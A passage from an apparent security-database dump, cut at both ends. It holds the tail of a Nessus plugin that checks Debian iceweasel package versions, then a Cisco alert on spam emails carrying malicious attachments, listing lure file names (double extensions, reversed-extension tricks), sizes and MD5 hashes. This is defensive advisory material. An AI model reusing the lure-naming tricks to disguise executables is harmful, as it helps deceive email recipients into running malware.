script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the iceweasel packages.\n\nFor the stable distribution (wheezy), these problems have been fixed\nin version 17.0.6esr-1~deb7u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:iceweasel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/06/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/06/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-dbg\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-dev\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-ach\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-af\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-all\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-an\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-ar\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-as\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-ast\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-be\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-bg\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-bn-bd\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-bn-in\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-br\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-bs\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-ca\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-cs\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-csb\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-cy\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-da\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-de\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-el\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-en-gb\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-en-za\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-eo\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-es-ar\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-es-cl\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-es-es\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-es-mx\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-et\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-eu\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-fa\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-ff\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-fi\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-fr\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-fy-nl\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-ga-ie\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-gd\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-gl\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-gu-in\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-he\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-hi-in\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-hr\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-hsb\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-hu\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-hy-am\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-id\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-is\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-it\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-ja\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-kk\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-km\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-kn\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-ko\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-ku\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-lij\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-lt\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-lv\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-mai\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-mk\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-ml\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-mr\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-ms\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-nb-no\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-nl\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-nn-no\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-or\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-pa-in\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-pl\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-pt-br\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-pt-pt\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-rm\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-ro\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-ru\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-si\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-sk\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-sl\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-son\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-sq\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-sr\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-sv-se\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-ta\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-te\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-th\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-tr\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-uk\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-vi\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-xh\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-zh-cn\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-zh-tw\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-zu\", reference:\"17.0.6esr-1~deb7u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ciscothreats": [{"lastseen": "2018-07-26T12:02:43", "bulletinFamily": "info", "description": "Medium\n\nAlert ID: \n\n32261\n\nFirst Published:\n\n2013 December 23 13:39 GMT\n\nLast Updated:\n\n2014 September 16 12:31 GMT\n\nVersion: \n\n69\n\n## \n\n Summary \n\n * Cisco Security has detected significant activity related to spam email messages that claim to contain a product quotation request for the recipient. The text in the email message attempts to convince the recipient to open the attachment and view the details. However, the _.zip_ attachment contains a malicious _.exe_ file that, when executed, attempts to infect the system with malicious code. \n \nEmail messages that are related to this threat (RuleID6396KVR) may contain the following files:\n\n> _Product Enquiry.zip_ \n_Product Enquiry.exe_ \n_Proforma Invoice.rar_ \n_P.I.exe_ \n_TT COPY.rar_ \n_TT COPY.exe_ \n_SWIFT COPY.rar_ \n_SWIFT COPY.exe_ \n_New Ben.scr_ \n_PAYMENT COPY.rar_ \n_INVOICE.scr_ \n_PAYMENT COPY.exe_ \n_Order YHK12B.rar_ \n_Order YHK12B.exe_ \n_telex copy.exe_ \n_purchase_order?gpj.rar_ \n_PURCHA~1.EXE_ \n_order1.rar_ \n_order1.exe_ \n_Invoice Payment.rar_ \n_gram.exe_ \n_Profoma Invoice.rar_ \n_Profoma Invoice.exe_ \n_purchaseorder.rar_ \n_purchaseorder.exe_ \n_dataorder.rar_ \n_L1.exe_ \n_0811435 New Sample Order.rar_ \n_0811435 New Sample Order.exe_ \n_TT SWIFT COPY.rar_ \n_2002.exe_ \n_NewOrder1.rar_ \n_NewOrder1.exe_ \n_Purchase Order.scr_ \n_February Order.rar_ \n_February Order.exe_ \n_AD payment slip.rar_ \n_AD slip.exe_ \n_HSBC Bank Slip.rar_ \n_HSBC Bank Slip.scr_ \n_Invoice Copy.rar_ \n_Invoice Copy.exe_ \n_invoice.rar_ \n_invoice.exe_ \n_ORDER?fdp.rar_ \n_ORDER?fdp.exe_ \n_Purchase_Order.rar_ \n_Purchase_Order.exe_ \n_Revised Purchase Order.rar_ \n_Revised Purchase Order.scr _ \n_projectionfff.exe_ \n_PO ORDER.rar_ \n_PO ORDER.scr_ \n_purchase order..rar_ \n_glucky.scr_ \n_March Order #BC80490.rar_ \n_March Order #BC80490.exe_ \n_ORIGINAL COPY.rar_ \n_ORIGINAL COPY.exe_ \n_payment.scr_ \n_April Order #BC80409.rar_ \n_March Order #BC80490.exe_ \n_purchase order.rar_ \n_ttcopy.rar_ \n_ttcopy.scr _ \n_Order#64441.rar_ \n_Order#64441.exe_ \n_PURCHRES ORDER.rar_ \n_PURCHRES ORDER.scr_ \n_Purchase order254.rar_ \n_Purchase order254.scr_ \n_April 2014 Order.rar_ \n_April 2014 Order.exe_ \n_Quotation.rar_ \n_Quotation.exe_ \n_neworder.rar_ \n_webblazer2-crypted.exe_ \n_New Order.exe_ \n_New pboy.scr_ \n_catalog.rar_ \n_catalog.exe_ \n_limi.exe_ \n_1st order.rar_ \n_1st order.scr_ \n_purchase order.exe \n#PO67456.exe \n#PO67456.rar \nNEW_PO11A_gpj.rar \nNEW_PO~1.EXE \nPO#948~1.EXE \nPO#9487?gpj.rar \nPO_W1108.exe \nPO_W1108.rar_ \n_NEW ORDER.pdf.rar \nNEW ORDER.pdf.exe \nOrder list.pdf.rar \nOrder list.pdf.exe_ \n_PO#4424221.rar \nPO#4424221.exe \nDocument.exe \nNew Order.rar \nPO140510.exe \nPO 140510.rar \nPO #23312.rar \nPO #23312.exe \nTT-COPY.rar \nNewOrder.exe \nPurchase order(2).rar \nPO.scr \nPO-140612.rar \nPO-140612.exe \norder_june.rar \norder_june.exe_ \n_Order List.rar \nOrder List.scr_ \n_PO32123 and Design.rar \nPO32123 and Design.exe \npayment slip.rar \nPI.exe \nOrder.rar \nOrder.exe \nJuly Order.rar \nJuly Order.exe \norder 1.rar \norder 1.exe \nNew Order5..rar \nPO#889458.rar \nPO#889458.exe \nPO987466.rar \nPO987466.exe \nCATALOGUE.rar \nCATALOGUE.exe \nPayment Slip Copy.rar \nPayment Slip Copy.exe _ \n_PO #110814.rar \nPO #110814.exe \nP.O.rar \nP.O.exe_ \n_Product detail.rar \nProduct detail.exe \nspecification.rar \nspecification.scr \nORDER LIST.pdf.............exe \nNew Order Catalogue.rar \nNewOrder02.exe \nScan copy.rar \nScan copy.exe_ \n_PO-#09032014.rar \nPO-#09032014.exe \nQuote List.rar \nQuote List.exe \nPO#56980..rar \nPO#56980..exe \nCopy PO.rar \nCopy PO.exe \nProforma Invoice.exe \nPO768493.rar \nPO768493.exe \n_\n\nThe _Product Enquiry.exe_ file in the _Product Enquiry.zip_ attachment has a file size of 1,081,916 bytes. The MD5 checksum, which is a unique identifier of the executable, is the following string: 0x656AD3A6E00F5CB8BF41AD19E73344B4 \n \nThe _P.I.exe_ file in the _Proforma Invoice.rar_ attachment has a file size of 1,206,092 bytes. The MD5 checksum is the following string: 0xD29811807FE4ABB16ED0A701BD553B41 \n \nThe _TT COPY.exe_ file in the _TT COPY.rar_ attachment has a file size of 1,059,142 bytes. The MD5 checksum is the following string: 0x553F724405AB1F65FB23CBEC8BC2ACE8 \n \nThe _SWIFT COPY.exe_ file in the _SWIFT COPY.rar_ attachment has a file size of 3,971,554 bytes. The MD5 checksum is the following string: 0x9B9CEC987D769390EE67334CEFCC0DC3 \n \nThe _New Ben.scr _file in the _Quotation.rar_ attachment has a file size of 1,025,024 bytes. The MD5 checksum is the following string: 0x4E196C2EC18394A367384FA171D56C28 \n \nThe _INVOICE.scr_ file in the _PAYMENT COPY.rar_ attachment has a file size of 1,573,925 bytes. The MD5 checksum is the following string: 0x6D47DCFB5C4B8757E00427E7099F426B \n \nThe _PAYMENT COPY.exe_ file in the _PAYMENT COPY.rar_ attachment has a file size of 673,280 bytes. The MD5 checksum is the following string: 0xC6D88192841173E40EDDA6A53D7A086D \n \nThe _Order YHK12B.exe_ file in the _Order YHK12B.rar_ attachment has a file size of 529,408 bytes. The MD5 checksum is the following string: 0xD668171052D689E41175D5C95B634C47 \n \nThe _telex copy.exe _file in the** **_new order.rar_ attachment has a file size of 696,832 bytes. The MD5 checksum is the following string: 0x12F337D49D4EAE60E3ABF839B5D95E35 \n \nThe _PURCHA~1.EXE_ file in the _purchase_order?gpj.rar_ attachment has a file size of 485,888 bytes. The MD5 checksum is the following string: 0x369AFF45B737901A86B50EF2BC6B1F31 \n \nThe _order1.exe_ file in the _order1.rar_ attachment has a file size of 887,808 bytes. The MD5 checksum is the following string: 0x7462842E219677B9B8F162006EE7E9F4 \n \nThe _gram.exe_ file in the _Invoice Payment.rar_ attachment has a file size of 298,297 bytes. The MD5 checksum is the following string: 0x1E845B255766B4462AC352EEB2627EBC \n \nThe _Profoma Invoice.exe_ file in the _Profoma Invoice.rar_ attachment has a file size of 581,632 bytes. The MD5 checksum is the following string: 0x4F221FED140F80776D8E93610F28B834 \n \nThe _purchaseorder.exe_ file in the _purchaseorder.rar _attachment has a file size of 485,888 bytes. The MD5 checksum is the following string: 0x90EA63BDBD01D2D8CB00F3CE810B4406 \n \nThe _L1.exe_ file in the _dataorder.rar_ attachment has a file size of 17,920 bytes. The MD5 checksum is the following string: 0x71EEE9B19B41CA6A85E90406BC40DAFE \n \nThe_ 0811435 New Sample Order.exe_ file in the _0811435 New Sample Order.rar_ attachment has a file size of 322,581 bytes. The MD5 checksum is the following string: 0xB7FF6610098AB62765FEE448AC30C058 \n \nThe _2002.exe_ file in the _TT SWIFT COPY.rar_ attachment has a file size of 297,274 bytes. The MD5 checksum, which is a unique identifier of the executable, is the following string: 0x37D0747D0B7B04CE9CAFCFA8B3612EFB \n \nThe _NewOrder1.exe_ file in the _NewOrder1.rar _attachment has a file size of 199,880 bytes. The MD5 checksum is the following string: 0x0CF164F2AEA55324492C0006A78ABAC2 \n \nThe _Purchase Order.scr_ file in the _PurchaseOrder.rar _attachment has a file size of 268,288 bytes. The MD5 checksum is the following string: 0xA418DC3BD0F8B7F6E3A9F19EB93F6E42 \n \nThe _February Order.exe_ file in the _February Order.rar _attachment has a file size of 782,336 bytes. The MD5 checksum is the following string: 0x3BC70CB2A530913AB9C21DB07D1D175C \n \nThe _AD slip.exe_ file in the _AD payment slip.rar_ attachment has a file size of 270,336 bytes. The MD5 checksum is the following string: 0x67909E0F072C80BEB6BB219643DB034E \n \nThe _HSBC Bank Slip.scr_ file in the _HSBC Bank Slip.rar_ attachment has a file size of 5,038,144 bytes. The MD5 checksum is the following string: 0xEA148A0C2FA9975EB7126222BEAFBD44 \n \nThe _Invoice Copy.exe _file in the _Invoice Copy.rar _attachment has a file size of 304,128 bytes. The MD5 checksum is the following string: 0x2E258084EECB11EB92AB48FABAFE44A1 \n \nThe _invoice.exe_ file in the _invoice.rar_ attachment has a file size of 904,192 bytes. The MD5 checksum is the following string: 0x2DCBF858D165C5D4002F6D72FA4342E8 \n \nThe _ORDER?fdp.exe_ file in the _ORDER?fdp.rar_ attachment has a file size of 614,400 bytes. The MD5 checksum is the following string: 0xCA101967DD513C54B323E285A63F5648 \n \nA variant of the _Profoma Invoice.exe_ file in the _Profoma Invoice.rar _attachment has a file size of 1,143,808 bytes. The MD5 checksum is the following string: 0x1F64C1DE1DD0DC5720095A77105A07CA \n \nThe _Purchase_Order.exe_ file in the _Purchase_Order.rar_ attachment has a file size of 812,544 bytes. The MD5 checksum is the following string: 0xDF09FDE801165B5D02190508840E585F \n \nThe _Revised Purchase Order.scr _file in the _Revised Purchase Order.rar _attachment has a file size of 899,584 bytes. The MD5 checksum is the following string: 0x8C7B69A5277B7798765DE7AA6D6B1F83 \n \nA third variant of the _Profoma Invoice.exe_ file in the _Profoma Invoice.rar_ attachment has a file size of 1,028,096 bytes. The MD5 checksum is the following string: 0x20DAE0328568F17E071DC2F0BC925D01 \n \nThe _projectionfff.exe_ file in the _invoice.rar_ attachment has a file size of 905,216 bytes. The MD5 checksum is the following string: 0x2E15692D344CC9E1517019DA2C0CB74F \n \nA variant of the _Revised Purchase Order.scr_ file in the _Revised Purchase Order.rar_ attachment has a file size of 510,976 bytes. The MD5 checksum is the following string: 0x3169EC91DB0B2F1ABE0AE452EEDAF0A3 \n \nThe _PO ORDER.scr_ file in the _PO ORDER.rar_ attachment has a file size of 1,228,996 bytes. The MD5 checksum is the following string: 0xFD222D1849477C86D169B24D3BACDDCC \n \nThe _glucky.scr_ file in the _Invoice purchase order..rar_ attachment has a file size of 1,569,460 bytes. The MD5 checksum is the following string:0xDEA4D840C649D8A71FC5D812F15AFCCD \n \nA variant of the _Invoice.scr_ file in the _Invoice.rar_ attachment has a file size of 476,672 bytes. The MD5 checksum is the following string: 0x330670B187D7861127DFD456819F1F56 \n \nA fourth variant of the _Profoma Invoice.exe _file in the _Profoma Invoice.rar_ attachment has a file size of 782,336 bytes. The MD5 checksum is the following string: 0x26104A78F0341632DC483BF73F3AFB6C \n \nThe _March Order #BC80490.exe_ file in the _March Order #BC80490.rar_ attachment has a file size of 782,336 bytes. The MD5 checksum is the following string: 0xE4618CE8DE9CFDC1155910BDECC6FBF6 \n \nThe _ORIGINAL COPY.exe_ file in the _ORIGINAL COPY.rar_ attachment has a file size of 850,891 bytes. The MD5 checksum is the following string: 0xC742A0B726BB51C01C339756117F6398 \n \nThe _payment.scr_ file in the _INVOICE.rar_ attachment has a file size of 1,279,900 bytes. The MD5 checksum is the following string: 0x4332C51A1E32AEF5F766FFD735319FB4 \n \nThe _March Order #BC80490.exe_ file in the _April Order #BC80409.rar_ attachment has a file size of 101,3248 bytes. The MD5 checksum is the following string: 0xCAC9E065DBABB636AC3FC77E2A17D8BB \n \nA variant of the _purchase order.scr_ file in the _purchase order.rar_ attachment has a file size of 1,047,951 bytes. The MD5 checksum is the following string: 2c75d47cdddbc7f0fcba5c010b4665ab \n \nThe_ ttcopy.scr _file in the_ ttcopy.rar _attachment has a file size of 379,904 bytes. The MD5 checksum is the following string: 0x6CDC04EB16748F90FAD2E4D3F6BCA089 \n \nThe _Order#64441.exe _in the _Order#64441.rar _file has a file size of 962,592 bytes.The MD5 checksum is the following string: 0xAF0DC6AF233816CCD8B12A83D27B42CC \n \nThe _PURCHRES ORDER.scr_ file in the _PURCHRES ORDER.rar_ attachment has a file size of 1,295,904 bytes. The MD5 checksum is the following string: 0x31BBA83B4270C2B6FD8F96DD8815FC1A \n \nThe_ Purchase order254.scr_ file in the _Purchase order254.rar_ attachment has a file size of 438,272 bytes. The MD5 checksum is the following string: 0xE20A312CEFADC3CFCC5D2120F87D0955 \n \nA fifth variant of the _Profoma Invoice.exe_ file in the _Profoma Invoice.rar_ attachment has a file size of 475,648 bytes. The MD5 checksum is the following string: 0xD1E071BA52CCAA074FA680EACAEFB584 \n \nThe _April 2014 Order.exe_ file in the _April 2014 Order.rar_ attachment has a file size of 475,648 bytes. The MD5 checksum is the following string: 0xFA3420BCA942449897D8E216AC524AFC \n \nThe _Quotation.exe_ file in the _Quotation.rar_ attachment has a file size of 475,648 bytes. The MD5 checksum is the following string: 0x2D2BD0394AF99CAA33BC77F1373F8F2C \n \nA sixth variant of the_ Profoma Invoice.exe_ file in the _Profoma Invoice.rar_ attachment has a file size of 1,088,512 bytes. The MD5 checksum is the following string: 0x30BF423ABC4A271D426F6C526D31F258 \n \nA seventh variant of the _Profoma Invoice.exe_ file in the_ Profoma Invoice.rar_ attachment has a file size of 1,088,512 bytes. The MD5 checksum is the following string: 0x785DFA284B999332A93BADDB1BBDDAD5 \n \nThe_ webblazer2-crypted.exe _in the _neworder.rar_ file has a file size of 1,059,749 bytes.The MD5 checksum is the following string: 0x558738E4F01F18D590F7240335840C3E \n \nThe _New Order.exe_ file in the _New Order.rar_ attachment has a file size of 279,552 bytes. The MD5 checksum is the following string: 0x84B3D897F4C7F4EEBD9BA3AA7DC4B669 \n \nThe_ New pboy.scr_ file in the _SWIFT COPY.rar_ attachment has a file size of 295,936 bytes. The MD5 checksum is the following string: 0x1E58CB08D4BDF2727C394167300D24B7 \n \nThe _catalog.exe _file in the _catalog.rar_ attachment has a file size of 958,602 bytes. The MD5 checksum is the following string: 0x93AFCB782BFDDFB4F60D114FE22FC05E \n \nThe _limi.exe _file in the _Swift Copy.rar _attachment has a file size of 262,656 bytes. The MD5 checksum is the following string: 0xECAE5FC539DF090211C57576CD1A4455 \n \nThe _1st order.scr_ file in the _1st order.rar_ attachment has a file size of 291,840 bytes. The MD5 checksum is the following string: 0x502A4262AC26438E251A54624D779974 \n \nThe _purchase order.exe_ file in the _purchase order.rar_ attachment has a file size of 338,432 bytes. The MD5 checksum is the following string: 0x34CAE5A81E71E74D1F3C25C13AF39EE6 \n \nA variant of the _QUOTATION.exe_ file in the _QUOTATION.rar_ attachment has a file size of 330,752 bytes. The MD5 checksum is the following string: 0xCC83B17B6B303F1DF861FCB50B367D2A \n \nThe _#PO67456.exe_ file in the _#PO67456.rar_ attachment has a file size of 490,496 bytes. The MD5 checksum is the following string: 0xEE8B0CF47841382C8FB43FA4CB7B69AF \n \nThe _NEW_PO~1.EXE_ file in the _NEW_PO11A_gpj.rar_ attachment has a file size of 491,008 bytes. The MD5 checksum is the following string: 0xC0EC5213AB5AE4C5C899C2F083EB39BD \n \nA variant of the _1st Order.scr_ file in the _1st Order.rar_ attachment has a file size of 984,064 bytes. The MD5 checksum is the following string: 0x53271A5B10C6CAA8114EA752B62EA2A2 \n \nThe _PO#948~1.EXE_ file in the _PO#9487?gpj.rar_ attachment has a file size of 502,784 bytes. The MD5 checksum is the following string: 0x2D8D4FF13289FF5D6394C3CA4AE893AE \n \nThe _PO_W1108.exe_ file in the _PO_W1108.rar_ attachment has a file size of 502,272 bytes. The MD5 checksum is the following string: 0xF1DBC2337AC6DA56916D0DBF5A179D86 \n \nThe _NEW ORDER.pdf.exe_ file in the _NEW ORDER.pdf.rar_ attachment has a file size of 583,680 bytes. The MD5 checksum is 